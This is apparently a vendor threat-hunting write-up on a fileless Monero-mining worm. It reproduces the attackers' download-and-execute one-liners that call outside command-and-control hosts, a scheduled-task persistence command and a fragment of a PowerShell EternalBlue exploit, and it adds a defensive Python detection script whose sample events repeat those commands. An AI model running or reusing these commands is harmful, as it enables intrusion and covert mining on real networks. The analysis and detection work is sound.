Threat Hunting: new fileless attack for crypto mining discovered
Tags: Fileless, Monero, WannaMine
Cryptocurrency mining (e.g. Bitcoin, Ethereum or Monero) is no longer a curiosity, and in recent years we have seen numerous attacks whose main goal was to install mining software. Remember that even before WannaCry appeared, attackers were already using the NSA's EternalBlue exploit to infiltrate companies and install this type of software on their victims' devices.
This is clearly a thriving business, and the complexity of the attacks keeps growing. A few days ago we discovered a new worm that uses hacking tools and scripts to spread inside corporate networks, with the ultimate goal of mining Monero on any network where it manages to gain a foothold.
When the experts of the Threat Hunting service at PandaLabs saw the following command being executed from one of the processes on a computer, an alarm was raised immediately:
cmd /v:on /c for /f "tokens=2 delims=.[" %i in ('ver') do (set a=%i)&if !a:~-1!==5 (echo on error resume next>%windir%\11.vbs&@echo set ox=createobject^("msxml2.xmlhttp"^)>>%windir%\11.vbs&@echo ox.open "get","http://stafftest.firewall-gateway.com:8000/info.vbs",false>>%windir%\11.vbs&@echo ox.setrequestheader "user-agent","-">>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo if ox.status=200 then>>%windir%\11.vbs&@echo set oas=createobject^("adodb.stream"^)>>%windir%\11.vbs&@echo oas.open>>%windir%\11.vbs&@echo oas.type=1>>%windir%\11.vbs&@echo oas.write ox.responsebody>>%windir%\11.vbs&@echo oas.savetofile "%windir%\info.vbs",2>>%windir%\11.vbs&@echo oas.close>>%windir%\11.vbs&@echo end if>>%windir%\11.vbs&@echo set os=createobject^("wscript.shell"^)>>%windir%\11.vbs&@echo os.exec^("cscript.exe %windir%\info.vbs"^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell -nop -noni -w hidden "if((get-wmiobject win32_operatingsystem).osarchitecture.contains('64')){iex(new-object net.webclient).downloadstring('http://stafftest.firewall-gateway.com:8000/info6.ps1')}else{iex(new-object net.webclient).downloadstring('http://stafftest.firewall-gateway.com:8000/info3.ps1')}")
The one-liner first parses the output of ver: with delims=.[ the second token is "Version N" and !a:~-1! is its last character. If that character is 5 (Windows XP or Server 2003, where PowerShell is normally not available) it writes a small VBScript downloader (MSXML2.XMLHTTP plus ADODB.Stream) to %windir%\11.vbs and runs it with cscript.exe to fetch and execute info.vbs. On any newer Windows it instead starts a hidden PowerShell that downloads info6.ps1 (64-bit) or info3.ps1 (32-bit) and runs it directly in memory with IEX, so nothing touches the disk on that branch.
Analysis of the spread through the network
Shortly after the investigation began, we observed that the attackers, aware that they had been discovered, shut down their command-and-control (C&C) servers, but before that we managed to download the following files:
• B6FCD1223719C8F6DAF4AB7FBEB9A20A (PS1, ~4 MB)
• 27E4F61EE65668D4C9AB4D9BF5D0A9E7 (VBS, ~2 MB)
These are two heavily obfuscated scripts. "Info6.ps1" loads the Mimikatz module (a DLL) into memory, without touching the hard disk, so that it can steal credentials that are later used for lateral movement in internal (unprotected) networks.
The script also implements in PowerShell the well-known SMB exploit for MS17-010, EternalBlue, so that it can go on to infect other, still unpatched Windows computers on the network. The fragment below is from the script (the byte arrays are truncated in the original); the variable names and constants, such as the HAL heap addresses, the fake SRVNET buffer and the FEA list, match the publicly available MS17-010 exploit code, ported here to PowerShell:
$TARGET_HAL_HEAP_ADDR_X64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_X86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList = [byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList += 0x00,0x00,0x8f,0x00 + $fakeSrvNetBuffer
$feaList += 0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct = @(0x00,0x00,0x00,0x00,0x00,0x00
At the same time it uses WMI for remote command execution. Once the credentials for a computer have been obtained, the process "wmiprvse.exe" appears on that computer, spawning PowerShell with a command line of the following form:
powershell.exe -nop -noni -w hidden -e JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad ...
Decoding the base64 of this command line (-e is -EncodedCommand, base64 over the UTF-16LE text of the script, which is why every encoded command starts with "JAB", the encoding of "$") yields the script presented in Appendix I.
Persistence in the system
In one of the scripts you can find the following command, which ensures the persistence of the threat on the system:
cmd /c echo powershell -nop "$a=([string](Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding));if(($a -eq $null) -or (!($a.contains('SCM Event Filter')))){IEX(New-Object Net.WebClient).DownloadString('http://stafftest.spdns.eu:8000/mate6.ps1')}" >%temp%\y1.bat && schtasks /create /ru system /sc daily /tn yastcat /f /tr "%temp%\y1.bat" && schtasks /run /tn yastcat
As you can see, it writes the PowerShell call into "%temp%\y1.bat", registers a daily scheduled task named "yastcat" that runs that batch file as SYSTEM, and runs the task immediately. The batch file checks whether a WMI permanent event subscription (a __FilterToConsumerBinding in root\subscription) named "SCM Event Filter" exists; if it does not, it downloads and executes "mate6.ps1", presumably to (re)create that subscription, so the scheduled task and the WMI subscription back each other up.
Please note that we do not have that file (mate6.ps1), because the command-and-control servers are currently offline.
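As an added example (not PandaLabs code and not part of the sample), the following Python triage script runs over a handful of constructed process-creation records modelled on the command lines quoted in this post: the stager and hidden download cradle, the encoded PowerShell spawned under wmiprvse.exe, and the schtasks / WMI-subscription persistence above. It decodes the -e/-EncodedCommand payload (base64 over UTF-16LE, tolerating a command line cut short by the log pipeline, as with the prefix shown earlier) and scores each record by the indicators it raises. The field names mirror Sysmon Event ID 1; the encoded payload, the y1.bat path under a user profile and the benign record are assumptions constructed for the example.

```python
"""Triage of Windows process-creation events for the behaviours quoted in this
post: the cmd/VBScript stager, hidden PowerShell download cradles, encoded
commands spawned under WmiPrvSE.exe, and the schtasks / WMI-subscription
persistence. Added example, not PandaLabs code; the events are constructed."""
import base64
import re

# -EncodedCommand accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...).
ENCODED_SWITCH = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Indicator regexes, applied to the raw command line and to any decoded payload.
INDICATORS = {
    "download-cradle": re.compile(r"net\.webclient|downloadstring|downloadfile", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "vbs-stager": re.compile(r"msxml2\.xmlhttp|adodb\.stream|\\11\.vbs", re.I),
    "wmi-subscription-probe": re.compile(r"__filtertoconsumerbinding|root\\subscription", re.I),
    "schtasks-system-bat": re.compile(
        r'schtasks\s+/create(?=.*\s/ru\s+system\b)(?=.*\s/tr\s+"?[^"]*\.bat)', re.I),
    "known-c2-host": re.compile(r"stafftest\.(?:spdns\.eu|firewall-gateway\.com)", re.I),
}
WEAK = {"hidden-window", "iex"}  # common in benign admin scripts when seen alone


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -e/-enc/-EncodedCommand, or None.
    Log pipelines often cut long command lines short, so an incomplete trailing
    base64 quartet and a dangling odd byte are dropped rather than raising."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    token = m.group(1)
    token = token[: len(token) - len(token) % 4]
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode("utf-16-le", errors="replace")


def analyse_event(event):
    """Return the sorted indicator tags raised by one process-creation event."""
    cmdline = event.get("CommandLine", "")
    tags = set()
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline
    if decoded is not None:
        tags.add("encoded-command")
        haystack += "\n" + decoded  # inspect the decoded script as well
    for tag, pattern in INDICATORS.items():
        if pattern.search(haystack):
            tags.add(tag)
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("wmiprvse.exe") and event.get("Image", "").lower().endswith("powershell.exe"):
        tags.add("wmi-spawned-powershell")  # remote execution over WMI, as in the post
    return sorted(tags)


def score(tags):
    """Weak indicators count 1, everything else 2."""
    return sum(1 if t in WEAK else 2 for t in tags)


def hunt(events, threshold=2):
    """Return (index, tags) for events whose indicators score at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        tags = analyse_event(ev)
        if tags and score(tags) >= threshold:
            hits.append((i, tags))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
# Constructed stand-in for the encoded payload (the post only shows its first bytes).
CONSTRUCTED_PAYLOAD = "iex (new-object net.webclient).downloadstring('http://stafftest.spdns.eu:8000/mate6.ps1')"
CONSTRUCTED_ENCODED = base64.b64encode(CONSTRUCTED_PAYLOAD.encode("utf-16-le")).decode()
# The post's own -E string (case restored); it is truncated in the post, hence the tolerant decoder.
POST_ENCODED_PREFIX = "JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad"

SAMPLE_EVENTS = [  # constructed Sysmon-Event-1-style records
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -noni -w hidden -e " + CONSTRUCTED_ENCODED},
    {"ParentImage": CMD, "Image": PS,
     "CommandLine": "powershell -nop -noni -w hidden \"if((get-wmiobject win32_operatingsystem)"
                    ".osarchitecture.contains('64')){iex(new-object net.webclient).downloadstring"
                    "('http://stafftest.firewall-gateway.com:8000/info6.ps1')}\""},
    {"ParentImage": CMD, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /ru system /sc daily /tn yastcat /f /tr "C:\Users\jdoe\AppData\Local\Temp\y1.bat"'},
    {"ParentImage": CMD, "Image": PS,  # what y1.bat launches
     "CommandLine": 'powershell -nop "$a=([string](Get-WmiObject -Namespace root\\subscription '
                    '-Class __FilterToConsumerBinding));if(($a -eq $null) -or '
                    '(!($a.contains(\'SCM Event Filter\')))){IEX(New-Object Net.WebClient)'
                    '.DownloadString(\'http://stafftest.spdns.eu:8000/mate6.ps1\')}"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # benign admin script
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -Command Get-Service"},
]

if __name__ == "__main__":
    for index, tags in hunt(SAMPLE_EVENTS):
        print(f"event {index}: score={score(tags)} {', '.join(tags)}")
```

The benign record scores only 1 (a hidden window on its own), so it is not reported, while the four records modelled on the post all cross the threshold; the truncated prefix from the post decodes to "$stime=[Environmen", which is enough to see that it is a script, not a stray token. Point hunt() at a real Sysmon or 4688 export with the same field names to use it outside the example.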
Infection vector
We still do not know the initial infection vector: the networks in which the infection was detected and blocked were in the middle of deploying Adaptive Defense, and at the time not all of the network was yet protected by the solution's advanced options. For this reason we were unable to determine who "patient zero" was and how it was compromised.
Among the possible options are the download and execution of a file or trojan that launched the worm in the first place, or remote execution through some kind of exploit.
Command-and-control servers
From the script "info6.ps1" we were able to extract the command-and-control server data:
• stafftest.spdns.eu
• stafftest.firewall-gateway.com
• 107.179.67.243
• 118.184.48.95
Note that these servers stopped working on October 27, 2017.
IOC
• exe (Monero miner, MD5 2ad7a39b17d08b3a685d36a23bf8d196)
• %windir%\11.vbs
• %windir%\info.vbs
• %windir%\info6.ps1
• dll
• dll
• Scheduled task "yastcat"
• stafftest.spdns.eu
• stafftest.firewall-gateway.com
• 107.179.67.243
• 118.184.48.95
Conclusion
Once again we are witnessing the professionalization of increasingly sophisticated attacks. Even when the goal is only to install Monero miners (leaving aside data theft, sabotage or espionage), attackers use advanced techniques and tactics. This is, in effect, a fileless attack: most traditional antivirus solutions can barely detect it, let alone react to it, and its victims can only wait for the necessary signatures to be generated (the attack is largely fileless, although, as we saw at the beginning, the scripts and the Monero client are still downloaded to the machine).
But those signatures will only cover this specific attack, so the slightest change renders them useless, not to mention that they detect only the result of the attack (its final stage), with no visibility into how the attack unfolds across the network and how computers are compromised.
Since the latest generation of security solutions not only classifies every running process on each computer but also makes it possible to monitor the whole network in real time, that visibility becomes an absolute necessity as attackers turn to techniques that abuse perfectly legitimate system utilities.
Observing all processes, we can see the following events:
• Process creation and remote code injection
• Creation, modification and opening of files
• Creation and modification of registry entries
• Network events (opening of connections, file downloads, etc.)
• Administrative events (user creation, etc.)